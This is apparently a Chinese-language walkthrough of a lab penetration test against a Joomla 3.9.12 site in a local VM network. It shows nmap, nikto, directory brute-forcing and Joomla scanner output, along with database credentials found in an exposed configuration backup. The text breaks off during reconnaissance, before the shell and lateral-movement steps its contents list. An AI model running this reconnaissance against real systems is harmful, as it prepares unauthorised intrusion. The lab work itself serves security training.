目录
前言
外网渗透
外网渗透打点
1、arp
2、nmap
3、nikto
4、whatweb
5、gobuster
6、dirsearch
CMS
1、主页内容
2、/configuration.php~ 目录
3、/administrator 目录
4、Joomla!_version探测
5、joomlascan python脚本
6、joomscan perl脚本
MySQL
1、远程登录
2、查看敏感数据
登录后台
1、成功登录
2、RCE漏洞
蚁剑连接
1、写入shell
2、disable_functions函数绕过
SSH连接
提权
内网渗透
横向渗透1
1、生成木马文件
2、开启监听
3、添加内网路由
横向渗透2
1、建立监听
2、进入meterpreter
3、添加内网路由
4、socks5代理
1、earthworm内网穿透工具
2、配置proxychains4.conf文件
5、内网主机发现
1、第一种模块
2、第二种模块
6、内网攻击
1、密码爆破
2、psexec工具
3、wmiexec.py
7、get flag
前言
在渗透测试中,黑盒测试(Black Box Testing)和白盒测试(White Box Testing)是两种常见的测试方法,它们用于评估目标系统的安全性和弱点。以下是它们的含义和区别:1. 黑盒测试(Black Box Testing):黑盒测试是一种从外部视角进行的测试方法,测试人员对被测试系统的内部结构和实现细节一无所知。测试人员将系统视为一个黑盒子,只关注输入与输出,并不考虑内部工作原理。黑盒测试主要侧重于检查系统的功能、安全漏洞、配置错误等。测试人员扮演外部攻击者的角色,尝试基于系统的可见行为和接口来发现潜在的漏洞。2. 白盒测试(White Box Testing):白盒测试是一种从内部视角进行的测试方法,测试人员对被测试系统的内部结构、设计和代码有充分的了解。测试人员可以查看和分析系统的源代码、配置文件和技术文档等内部细节。白盒测试主要侧重于评估系统的结构、设计、安全实现和代码质量。测试人员可以使用静态代码分析、代码审查等技术来发现潜在的漏洞和安全风险。黑盒测试和白盒测试各有优势和适用场景。黑盒测试更加注重系统的功能和用户角度,能够模拟真实攻击者的行为。白盒测试更加注重系统的内部安全性和代码质量,能够深入分析实现细节并发现隐藏的漏洞。在实际渗透测试中,通常会结合使用黑盒测试和白盒测试的方法,以全面评估系统的安全性。这样可以从不同的角度识别并修复潜在的漏洞,提高系统的防御能力。
靶机搭建
1、首先添加一块VMnet2的网卡,子网地址配为:192.168.93.0
2、启动centos靶机,并且使用 “ service network restart ” 命令来获取ip,因为centos有两块网卡,一块桥接网卡,一块VMnet2网卡;前者做外网ip,后者做内网ip。
3、需要改动的靶机只有centos,别的不能动,也千万不能重启。因为部分服务没有自启动功能。如果需要关机,一定要先把各靶机挂起。
4、因为使用的是桥接网卡,所以我们的kali攻击机的网卡也要使用桥接模式。
5、在centos里面使用 ” ifconfig eth0 “ 命令,来看一下有没有获取到ip;在kali里面使用 “ ip a” 命令看看是否获取到IP。
6、最后,我们去浏览器访问一下目标靶机,看看是否可以访问成功。192.168.93.10 WIN-8GA56TNV3MV
192.168.93.20 WIN2008
192.168.93.30 WIN7
192.168.93.100 192.168.1.21 Centos
192.168.93.120 Ubantu
192.168.1.20 kali
本次打靶练习是一个黑盒测试。所以没有密码,我们的目标是拿到域控制器的权限,并找到其中的重要文件。
外网渗透
外网渗透打点
1、arp
┌──(root㉿ru)-[~/lianxi]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:c7:bf, IPv4: 192.168.1.20
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.1.1 00:03:0f:2b:90:20 Digital China (Shanghai) Networks Ltd.
192.168.1.2 d4:8f:a2:9f:51:49 Huawei Device Co., Ltd.
192.168.1.6 3c:55:76:dc:ab:f5 CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.5 7c:b5:66:a5:f0:a5 Intel Corporate
192.168.1.14 7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.13 7c:b5:66:a5:f0:a5 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.21 00:0c:29:32:46:c9 VMware, Inc.
192.168.1.4 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.9 fa:f1:bf:c4:d1:1d (42:f1:e2:49:51:a5) (Unknown: locally administered)
192.168.1.16 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.18 30:03:c8:49:52:4d (42:f1:e2:49:51:a5) CLOUD NETWORK TECHNOLOGY SINGAPORE PTE. LTD.
192.168.1.7 c4:75:ab:58:e4:8b (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.8 3c:e9:f7:c0:ef:c7 (42:f1:e2:49:51:a5) Intel Corporate
192.168.1.17 42:45:ab:5e:e9:ce (42:f1:e2:49:51:a5) (Unknown: locally administered)14 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.346 seconds (109.12 hosts/sec). 14 responded
2、nmap
端口探测┌──(root㉿ru)-[~/lianxi]
└─# nmap -p- 192.168.1.21 --min-rate 10000 -oA ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 12:06 CST
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)Nmap done: 1 IP address (1 host up) scanned in 5.45 seconds如何提取端口
┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap
# Nmap 7.94 scan initiated Fri Dec 1 12:06:52 2023 as: nmap -p- --min-rate 10000 -oA ports 192.168.1.21
Nmap scan report for 192.168.1.21
Host is up (0.0015s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
3306/tcp open mysql
MAC Address: 00:0C:29:32:46:C9 (VMware)# Nmap done at Fri Dec 1 12:06:58 2023 -- 1 IP address (1 host up) scanned in 5.45 seconds┌──(root㉿ru)-[~/lianxi]
└─# cat ports.nmap | awk '{print($1)}' | head -n 8 | tail -n 3 | awk -F "/" '{print($1)}' | xargs -n3 | sed 's/ /,/g'
22,80,3306//涉及到 awk、sed、head、tail、xargs等命令。
信息探测┌──(root㉿ru)-[~/lianxi]
└─# nmap -sC -sV -sT -O -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA XX
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:22 CST
Nmap scan report for 192.168.1.21
Host is up (0.00028s latency).PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.3 (protocol 2.0)
| ssh-hostkey:
| 1024 25:84:c6:cc:2c:8a:7b:8f:4a:7c:60:f1:a3:c9:b0:22 (DSA)
|_ 2048 58:d1:4c:59:2d:85:ae:07:69:24:0a:dd:72:0f:45:a5 (RSA)
80/tcp open http nginx 1.9.4
|_http-title: 502 Bad Gateway
|_http-server-header: nginx/1.9.4
3306/tcp open tcpwrapped
MAC Address: 00:0C:29:32:46:C9 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hopOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 51.63 secondsudp探测┌──(root㉿ru)-[~/lianxi]
└─# nmap -sU 192.168.1.21 --min-rate 10000 -oA udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 14:23 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).
Not shown: 994 open|filtered udp ports (no-response)
PORT STATE SERVICE
2/udp closed compressnet
9000/udp closed cslistener
16862/udp closed unknown
41971/udp closed unknown
46836/udp closed unknown
49185/udp closed unknown
MAC Address: 00:0C:29:32:46:C9 (VMware)Nmap done: 1 IP address (1 host up) scanned in 0.43 seconds漏洞探测┌──(root㉿ru)-[~/lianxi]
└─# nmap --script=vuln -p 22,80,3306 192.168.1.21 --min-rate 10000 -oA vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-01 15:20 CST
Nmap scan report for 192.168.1.21
Host is up (0.00021s latency).PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
| http-dombased-xss:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
| Found the following indications of potential DOM based XSS:
|
| Source: window.open(this.href,'win2','status=no,toolbar=no,scrollbars=yes,titlebar=no,menubar=no,resizable=yes,width=640,height=480,directories=no,location=no')
|_ Pages: http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/, http://192.168.1.21:80/index.php/6-your-template, http://192.168.1.21:80/index.php/5-your-modules, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php, http://192.168.1.21:80/index.php/4-about-your-home-page
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.1.21
| Found the following possible CSRF vulnerabilities:
|
| Path: http://192.168.1.21:80/
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/6-your-template
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/login
| Form id: mod-search-searchword87
| Form action: /index.php/login
|
| Path: http://192.168.1.21:80/index.php/login
| Form id: username-lbl
| Form action: /index.php/login?task=user.login
|
| Path: http://192.168.1.21:80/index.php/5-your-modules
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/author-login
| Form id: mod-search-searchword87
| Form action: /index.php/author-login
|
| Path: http://192.168.1.21:80/index.php/author-login
| Form id: username-lbl
| Form action: /index.php/author-login?task=user.login
|
| Path: http://192.168.1.21:80/index.php
| Form id: mod-search-searchword87
| Form action: /index.php
|
| Path: http://192.168.1.21:80/index.php/4-about-your-home-page
| Form id: mod-search-searchword87
|_ Form action: /index.php
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
| /administrator/: Possible admin folder
| /administrator/index.php: Possible admin folder
| /robots.txt: Robots file
| /administrator/manifests/files/joomla.xml: Joomla version 3.9.12
| /language/en-GB/en-GB.xml: Joomla version 3.9.12
| /htaccess.txt: Joomla!
| /README.txt: Interesting, a readme.
| /bin/: Potentially interesting folder
| /cache/: Potentially interesting folder
| /images/: Potentially interesting folder
| /includes/: Potentially interesting folder
| /libraries/: Potentially interesting folder
| /modules/: Potentially interesting folder
| /templates/: Potentially interesting folder
|_ /tmp/: Potentially interesting folder
3306/tcp open mysql
|_mysql-vuln-cve2012-2122: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:32:46:C9 (VMware)Nmap done: 1 IP address (1 host up) scanned in 74.52 seconds3、nikto
┌──(root㉿ru)-[~/lianxi]
└─# nikto -h 192.168.1.21 nikto.txt
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.1.21
+ Target Hostname: 192.168.1.21
+ Target Port: 80
+ Start Time: 2023-12-01 15:19:50 (GMT8)
---------------------------------------------------------------------------
+ Server: nginx/1.9.4
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /robots.txt: Entry '/libraries/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/modules/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cache/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/layouts/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/includes/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/administrator/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/cli/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/tmp/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/plugins/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/bin/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/language/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: Entry '/components/' is returned a non-forbidden or redirect HTTP code (200). See: https://portswigger.net/kb/issues/00600600_robots-txt-file
+ /robots.txt: contains 14 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /administrator/: This might be interesting.
+ /bin/: This might be interesting.
+ /includes/: This might be interesting.
+ /tmp/: This might be interesting.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /htaccess.txt: Default Joomla! htaccess.txt file found. This should be removed or renamed.
+ /administrator/index.php: Admin login page/section found.
+ 8924 requests: 0 error(s) and 24 item(s) reported on remote host
+ End Time: 2023-12-01 15:20:26 (GMT8) (36 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested4、whatweb
┌──(root㉿ru)-[~/lianxi]
└─# whatweb -v http://192.168.1.21
WhatWeb report for http://192.168.1.21
Status : 200 OK
Title : Home
IP : 192.168.1.21
Country : RESERVED, ZZSummary : Bootstrap, Cookies[d238a471ae12a7732425ae4995e23fce], HTML5, HTTPServer[nginx/1.9.4], HttpOnly[d238a471ae12a7732425ae4995e23fce], JQuery, MetaGenerator[Joomla! - Open Source Content Management], nginx[1.9.4], OpenSearch[http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch], ScriptDetected Plugins:
[ Bootstrap ]Bootstrap is an open source toolkit for developing with HTML, CSS, and JS. Website : https://getbootstrap.com/[ Cookies ]Display the names of cookies in the HTTP headers. The values are not returned to save on space. String : d238a471ae12a7732425ae4995e23fce[ HTML5 ]HTML version 5, detected by the doctype declaration [ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. String : nginx/1.9.4 (from server string)[ HttpOnly ]If the HttpOnly flag is included in the HTTP set-cookie response header and the browser supports it then the cookie cannot be accessed through client side script - More Info: http://en.wikipedia.org/wiki/HTTP_cookie String : d238a471ae12a7732425ae4995e23fce[ JQuery ]A fast, concise, JavaScript that simplifies how to traverse HTML documents, handle events, perform animations, and add AJAX. Website : http://jquery.com/[ MetaGenerator ]This plugin identifies meta generator tags and extracts its value. String : Joomla! - Open Source Content Management[ OpenSearch ]This plugin identifies open search and extracts the URL. OpenSearch is a collection of simple formats for the sharing of search results. String : http://192.168.1.21/index.php/component/search/?layout=blog&id=9&Itemid=101&format=opensearch[ Script ]This plugin detects instances of script HTML elements and returns the script language/type. [ nginx ]Nginx (Engine-X) is a free, open-source, high-performance HTTP server and reverse proxy, as well as an IMAP/POP3 proxy server. Version : 1.9.4Website : http://nginx.net/HTTP Headers:HTTP/1.1 200 OKServer: nginx/1.9.4Date: Mon, 07 Oct 2019 08:29:39 GMTContent-Type: text/html; charset=utf-8Content-Length: 4001Connection: closeSet-Cookie: d238a471ae12a7732425ae4995e23fce=r8kse6ihf5gjio9jiuegcd1qvj; path=/; HttpOnlyExpires: Wed, 17 Aug 2005 00:00:00 GMTLast-Modified: Fri, 01 Dec 2023 07:23:51 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheVary: Accept-EncodingContent-Encoding: gzip5、gobuster
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# gobuster dir -u http://192.168.1.21 -w directory-list-lowercase-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.21
[+] Method: GET
[+] Threads: 10
[+] Wordlist: directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 313] [--> http://192.168.1.21/images/]
/media (Status: 301) [Size: 312] [--> http://192.168.1.21/media/]
/templates (Status: 301) [Size: 316] [--> http://192.168.1.21/templates/]
/modules (Status: 301) [Size: 314] [--> http://192.168.1.21/modules/]
/bin (Status: 301) [Size: 310] [--> http://192.168.1.21/bin/]
/plugins (Status: 301) [Size: 314] [--> http://192.168.1.21/plugins/]
/includes (Status: 301) [Size: 315] [--> http://192.168.1.21/includes/]
/language (Status: 301) [Size: 315] [--> http://192.168.1.21/language/]
/components (Status: 301) [Size: 317] [--> http://192.168.1.21/components/]
/cache (Status: 301) [Size: 312] [--> http://192.168.1.21/cache/]
/libraries (Status: 301) [Size: 316] [--> http://192.168.1.21/libraries/]
/tmp (Status: 301) [Size: 310] [--> http://192.168.1.21/tmp/]
/layouts (Status: 301) [Size: 314] [--> http://192.168.1.21/layouts/]
/administrator (Status: 301) [Size: 320] [--> http://192.168.1.21/administrator/]
/cli (Status: 301) [Size: 310] [--> http://192.168.1.21/cli/]6、dirsearch
┌──(root㉿ru)-[/usr/share/dirbuster/wordlists]
└─# dirsearch -u http://192.168.1.21 -e*_|. _ _ _ _ _ _|_ v0.4.2(_||| _) (/_(_|| (_| )Extensions: php, jsp, asp, aspx, do, action, cgi, pl, html, htm, js, json, tar.gz, bak | HTTP method: GET | Threads: 30 | Wordlist size: 15490Output File: /root/.dirsearch/reports/192.168.1.21/_23-12-01_15-26-31.txtError Log: /root/.dirsearch/logs/errors-23-12-01_15-26-31.logTarget: http://192.168.1.21/[15:26:31] Starting:
[15:26:50] 200 - 18KB - /LICENSE.txt
[15:26:50] 200 - 5KB - /README.txt
[15:26:59] 403 - 277B - /administrator/.htaccess
[15:26:59] 301 - 320B - /administrator -> http://192.168.1.21/administrator/
[15:26:59] 200 - 5KB - /administrator/
[15:26:59] 200 - 2KB - /administrator/includes/
[15:26:59] 200 - 31B - /administrator/cache/
[15:26:59] 200 - 5KB - /administrator/index.php
[15:26:59] 301 - 325B - /administrator/logs -> http://192.168.1.21/administrator/logs/
[15:26:59] 200 - 31B - /administrator/logs/
[15:27:02] 301 - 310B - /bin -> http://192.168.1.21/bin/
[15:27:02] 200 - 31B - /bin/
[15:27:03] 301 - 312B - /cache -> http://192.168.1.21/cache/
[15:27:03] 200 - 31B - /cache/
[15:27:04] 200 - 31B - /cli/
[15:27:04] 301 - 317B - /components -> http://192.168.1.21/components/
[15:27:04] 200 - 31B - /components/
[15:27:05] 200 - 0B - /configuration.php
[15:27:05] 200 - 2KB - /configuration.php~
[15:27:10] 200 - 3KB - /htaccess.txt
[15:27:11] 301 - 313B - /images -> http://192.168.1.21/images/
[15:27:11] 200 - 31B - /images/
[15:27:11] 301 - 315B - /includes -> http://192.168.1.21/includes/
[15:27:11] 200 - 31B - /includes/
[15:27:11] 200 - 16KB - /index.php
[15:27:11] 200 - 9KB - /index.php/login/
[15:27:13] 301 - 315B - /language -> http://192.168.1.21/language/
[15:27:13] 200 - 31B - /layouts/
[15:27:13] 301 - 316B - /libraries -> http://192.168.1.21/libraries/
[15:27:13] 200 - 31B - /libraries/
[15:27:15] 301 - 312B - /media -> http://192.168.1.21/media/
[15:27:15] 200 - 31B - /media/
[15:27:16] 301 - 314B - /modules -> http://192.168.1.21/modules/
[15:27:16] 200 - 31B - /modules/
[15:27:20] 200 - 31B - /plugins/
[15:27:21] 301 - 314B - /plugins -> http://192.168.1.21/plugins/
[15:27:23] 200 - 829B - /robots.txt
[15:27:24] 403 - 277B - /server-status
[15:27:24] 403 - 277B - /server-status/
[15:27:28] 301 - 316B - /templates -> http://192.168.1.21/templates/
[15:27:28] 200 - 31B - /templates/
[15:27:28] 200 - 31B - /templates/index.html
[15:27:28] 200 - 0B - /templates/protostar/
[15:27:28] 200 - 0B - /templates/system/
[15:27:28] 200 - 0B - /templates/beez3/
[15:27:30] 301 - 310B - /tmp -> http://192.168.1.21/tmp/
[15:27:30] 200 - 31B - /tmp/
[15:27:35] 200 - 2KB - /web.config.txtCMS
1、主页内容
主页是一些博客内容。经过探索,没有发现可以利用点。
根据提示这个网站用的模板是Protostar.
经过探测,可以通过这个id号码进行不同内容的访问。不过最多好像只能访问到6.
2、/configuration.php~ 目录
经过目录探测,我们找到了网站的配置文件。而且我们还找到了数据库的账号以及密码。账号:testuser
密码:cvcvgjASD!@
3、/administrator 目录
果真是Joomla! ,进行下一步探测。
4、Joomla!_version探测
我们可以使用msf里面的辅助模块进行扫描。
msf6 > search Joomla_versionMatching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 auxiliary/scanner/http/joomla_version normal No Joomla Version ScannerInteract with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/joomla_versionmsf6 >msf6 > use 0
msf6 auxiliary(scanner/http/joomla_version) > show optionsModule options (auxiliary/scanner/http/joomla_version):Name Current Setting Required Description---- --------------- -------- -----------Proxies no A proxy chain of format type:host:port[,type:host:port][...]RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.htmlRPORT 80 yes The target port (TCP)SSL false no Negotiate SSL/TLS for outgoing connectionsTARGETURI / yes The base path to the Joomla applicationTHREADS 1 yes The number of concurrent threads (max one per host)VHOST no HTTP server virtual hostView the full module info with the info, or info -d command.msf6 auxiliary(scanner/http/joomla_version) > set rhosts 192.168.1.21
rhosts => 192.168.1.21
msf6 auxiliary(scanner/http/joomla_version) > exploit[*] Server: nginx/1.9.4
[+] Joomla version: 3.9.12
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed经过探测,cms的版本是3.9.12的。那么我们就可以定位到相应的exp了。
┌──(root㉿ru)-[~/lianxi]
└─# searchsploit Joomla 3.9.12
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------Exploit Title | Path
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Joomla! Component Easydiscuss < 4.0.21 - Cross-Site Scripting | php/webapps/43488.txt
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results┌──(root㉿ru)-[~/lianxi]
└─# searchsploit -m 43488.txtExploit: Joomla! Component Easydiscuss < 4.0.21 - Cross-Site ScriptingURL: https://www.exploit-db.com/exploits/43488Path: /usr/share/exploitdb/exploits/php/webapps/43488.txtCodes: CVE-2018-5263Verified: True
File Type: Unicode text, UTF-8 text
Copied to: /root/lianxi/43488.txt┌──(root㉿ru)-[~/lianxi]
└─# ls
43488.txt ports.gnmap ports.nmap ports.xml port.txt udp.gnmap udp.nmap udp.xml vuln.gnmap vuln.nmap vuln.xml whatweb.txt XX.gnmap XX.nmap XX.xml┌──(root㉿ru)-[~/lianxi]
└─# cat 43488.txt
# Exploit Title: Joomla Plugin Easydiscuss <4.0.21 Persistent XSS in Edit Message
# Date: 06-01-2018
# Software Link: https://stackideas.com/easydiscuss
# Exploit Author: Mattia Furlani
# CVE: CVE-2018-5263
# Category: webapps1. DescriptionWhenever a user edits a message with <\textarea> inside the body, everything after the <\textarea> will be executed in the user’s browser. Works with every version up to 4.0.202. Proof of ConceptLogin with permissions to post a message, insert <\textarea> in the body and add any html code after that, whenever a user tries to edit that message the code writed after you closed the textarea will be executed3. Solution:Update to version 4.0.21
https://stackideas.com/blog/easydiscuss4021-update
找到了对应的exp了,但是这些漏洞都需要管理员的权限才行。所以我们需要进行下一步探测。
5、joomlascan python脚本
┌──(root㉿ru)-[~/tools/JoomlaScan]
└─# python2 joomlascan.py -u http://192.168.1.21 -t 5
-------------------------------------------Joomla Scan Usage: python joomlascan.py <target> Version 0.5beta - Database Entries 1235created by Andrea Draghetti
-------------------------------------------
Robots file found: > http://192.168.1.21/robots.txt
No Error Log foundStart scan...with 10 concurrent threads!
Component found: com_actionlogs > http://192.168.1.21/index.php?option=com_actionlogsOn the administrator componentsLICENSE file found > http://192.168.1.21/administrator/components/com_actionlogs/actionlogs.xmlExplorable Directory > http://192.168.1.21/components/com_actionlogs/Explorable Directory > http://192.168.1.21/administrator/components/com_actionlogs/
Component found: com_admin > http://192.168.1.21/index.php?option=com_adminOn the administrator componentsLICENSE file found > http://192.168.1.21/administrator/components/com_admin/admin.xmlExplorable Directory > http://192.168.1.21/components/com_admin/Explorable Directory > http://192.168.1.21/administrator/components/com_admin/
Component found: com_ajax > http://192.168.1.21/index.php?option=com_ajaxBut possibly it is not active or protectedLICENSE file found > http://192.168.1.21/administrator/components/com_ajax/ajax.xmlExplorable Directory > http://192.168.1.21/components/com_ajax/Explorable Directory > http://192.168.1.21/administrator/components/com_ajax/
Component found: com_banners > http://192.168.1.21/index.php?option=com_bannersBut possibly it is not active or protectedLICENSE file found > http://192.168.1.21/administrator/components/com_banners/banners.xmlExplorable Directory > http://192.168.1.21/components/com_banners/Explorable Directory > http://192.168.1.21/administrator/components/com_banners/
Component found: com_config > http://192.168.1.21/index.php?option=com_config
Component found: com_contact > http://192.168.1.21/index.php?option=com_contactLICENSE file found > http://192.168.1.21/administrator/components/com_contact/contact.xmlLICENSE file found > http://192.168.1.21/administrator/components/com_config/config.xml
Component found: com_content > http://192.168.1.21/index.php?option=com_content
Component found: com_contenthistory > http://192.168.1.21/index.php?option=com_contenthistoryBut possibly it is not active or protectedExplorable Directory > http://192.168.1.21/components/com_config/Explorable Directory > http://192.168.1.21/components/com_contact/Explorable Directory > http://192.168.1.21/administrator/components/com_config/LICENSE file found > http://192.168.1.21/administrator/components/com_content/content.xmlLICENSE file found > http://192.168.1.21/administrator/components/com_contenthistory/contenthistory.xmlExplorable Directory > http://192.168.1.21/administrator/components/com_contact/Explorable Directory > http://192.168.1.21/components/com_contenthistory/Explorable Directory > http://192.168.1.21/components/com_content/Explorable Directory > http://192.168.1.21/administrator/components/com_contenthistory/Explorable Directory > http://192.168.1.21/administrator/components/com_content/
Component found: com_fields > http://192.168.1.21/index.php?option=com_fieldsBut possibly it is not active or protectedLICENSE file found > http://192.168.1.21/administrator/components/com_fields/fields.xmlExplorable Directory > http://192.168.1.21/components/com_fields/Explorable Directory > http://192.168.1.21/administrator/components/com_fields/
Component found: com_installer > http://192.168.1.21/index.php?option=com_installerOn the administrator componentsLICENSE file found > http://192.168.1.21/administrator/components/com_installer/installer.xmlExplorable Directory > http://192.168.1.21/components/com_installer/Explorable Directory > http://192.168.1.21/administrator/components/com_installer/
Component found: com_joomlaupdate > http://192.168.1.21/index.php?option=com_joomlaupdateOn the administrator componentsLICENSE file found > http://192.168.1.21/administrator/components/com_joomlaupdate/joomlaupdate.xmlExplorable Directory > http://192.168.1.21/components/com_joomlaupdate/Explorable Directory > http://192.168.1.21/administrator/components/com_joomlaupdate/
Component found: com_mailto > http://192.168.1.21/index.php?option=com_mailtoBut possibly it is not active or protectedLICENSE file found > http://192.168.1.21/components/com_mailto/mailto.xmlExplorable Directory > http://192.168.1.21/components/com_mailto/
Component found: com_media > http://192.168.1.21/index.php?option=com_mediaBut possibly it is not active or protectedLICENSE file found > http://192.168.1.21/administrator/components/com_media/media.xmlExplorable Directory > http://192.168.1.21/components/com_media/Explorable Directory > http://192.168.1.21/administrator/components/com_media/
Component found: com_newsfeeds > http://192.168.1.21/index.php?option=com_newsfeedsLICENSE file found > http://192.168.1.21/administrator/components/com_newsfeeds/newsfeeds.xmlExplorable Directory > http://192.168.1.21/components/com_newsfeeds/Explorable Directory > http://192.168.1.21/administrator/components/com_newsfeeds/
Component found: com_search > http://192.168.1.21/index.php?option=com_searchLICENSE file found > http://192.168.1.21/administrator/components/com_search/search.xmlExplorable Directory > http://192.168.1.21/components/com_search/Explorable Directory > http://192.168.1.21/administrator/components/com_search/
Component found: com_users > http://192.168.1.21/index.php?option=com_usersLICENSE file found > http://192.168.1.21/administrator/components/com_users/users.xmlExplorable Directory > http://192.168.1.21/components/com_users/Explorable Directory > http://192.168.1.21/administrator/components/com_users/
Component found: com_wrapper > http://192.168.1.21/index.php?option=com_wrapperLICENSE file found > http://192.168.1.21/components/com_wrapper/wrapper.xmlExplorable Directory > http://192.168.1.21/components/com_wrapper/
End Scanner
6、joomscan perl脚本
perl joomscan.pl -u 192.168.1.21____ _____ _____ __ __ ___ ___ __ _ _ (_ _)( _ )( _ )( \/ )/ __) / __) /__\ ( \( ).-_)( )(_)( )(_)( ) ( \__ \( (__ /(__)\ ) ( \____) (_____)(_____)(_/\/\_)(___/ \___)(__)(__)(_)\_)(1337.today)--=[OWASP JoomScan+---++---==[Version : 0.0.7+---++---==[Update Date : [2018/09/23]+---++---==[Authors : Mohammad Reza Espargham , Ali Razmjoo--=[Code name : Self Challenge@OWASP_JoomScan , @rezesp , @Ali_Razmjo0 , @OWASPProcessing http://192.168.1.21 ...[+] FireWall Detector
[++] Firewall not detected[+] Detecting Joomla Version
[++] Joomla 3.9.12[+] Core Joomla Vulnerability
[++] Target Joomla core is not vulnerable[+] Checking Directory Listing
[++] directory has directory listing :
http://192.168.1.21/administrator/components
http://192.168.1.21/administrator/modules
http://192.168.1.21/administrator/templates
